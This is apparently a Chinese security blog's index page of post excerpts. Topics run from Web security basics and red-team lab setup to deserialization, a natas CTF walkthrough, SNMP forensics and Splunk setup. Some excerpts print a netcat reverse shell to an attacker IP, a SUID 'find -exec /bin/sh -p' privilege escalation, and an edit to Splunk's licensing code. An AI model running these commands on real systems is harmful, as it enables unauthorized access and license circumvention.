摘要:
Web 安全入门 前言 网络安全是一个系统化工程,Web 安全只是其很小的一个部分,因为 Web 应用是目前最常见的软件服务形式,所以 Web 往往是黑客们青睐的攻击点。 我们可以将渗透测试简单地理解为对 Web 应用开展的安全性测试,所以理解 Web 应用的工作原理是开展一切渗透测试工作的前提,涉 阅读全文
摘要:
ATT&CK红队评估一 镜像下载 镜像下载地址 网络配置 网络拓扑图 VMware 网络配置 使用 VMware 的『虚拟网络编辑器』添加两个虚拟网络。 虚拟网络名称 网段 DHCP VMnet3 192.168.72.0/24 是 VMnet4 192.168.52.0/24 是 虚拟机网络配置 阅读全文
摘要:
1 序列化与反序列化 1.1 概念 序列化: 将数据结构或对象转换成二进制串的过程 反序列化:将在序列化过程中所生成的二进制串转换成数据结构或者对象的过程 1.2 使用场景 当你想把的内存中的对象状态保存到一个文件中或者数据库中时候。 当你想用套接字在网络上传送对象的时候。 当你想通过 RMI 传输 阅读全文
摘要:
0x00 natas0 http://natas0.natas.labs.overthewire.org/ 直接 F12 查看源码,找到密码。 0x01 natas1 http://natas1.natas.labs.overthewire.org/ 禁用了右键,直接 F12 查看源码,找到密码。 阅读全文
摘要:
1 WebShell 到 bash/sh 1.1 反弹 Shell 攻击机器 $ nc -lvvp 4444 # 开启 4444 端口,等待目标机器回连 受害机器 $ nc -nv x.x.x.x 4444 -e /bin/bash # x.x.x.x 是攻击机器的IP,将Shell反弹 2 不同用 阅读全文
摘要:
1 find 命令提权 1.1 方法一 find / -perm -g=s -type f 2>/dev/null find . -exec /bin/sh -p \;-quit 1.2 方法二 touch getshell find / -type f -name getshell -exec " 阅读全文
摘要:
关闭splunk: sudo splunk stop cd /opt/splunk/lib/python2.7/site-packages/splunk/appserver/mrsparkle/controllers sudo vi licensing.py 找到: if action == 'ad 阅读全文
摘要:
下载地址: https://download.splunk.com/products/splunk/releases/8.2.4/linux/splunk-8.2.4-87e2dda940d1-linux-2.6-amd64.deb md5校验下载地址: https://download.splun 阅读全文
摘要:
1 SNMP 取证 1.1 背景知识 SNMP,即简单网管协议,该协议能够支持网络管理系统,用以监测连接到网络上的设备是否有任何引起管理上关注的情况。它由一组网络管理的标准组成,包含一个应用层协议(application layer protocol)、数据库模式(database schema), 阅读全文
摘要:
查看syslog cd /var/log tail -f syslog |grep sogou 然后用搜狗输入法随便输入一些文字,查看有没有报错。 如图所示,提示缺少libqt5qml5 # 安装缺少的组件,安装完在右上角重启输入法。 sudo apt install libqt5qml5 如图所示 阅读全文
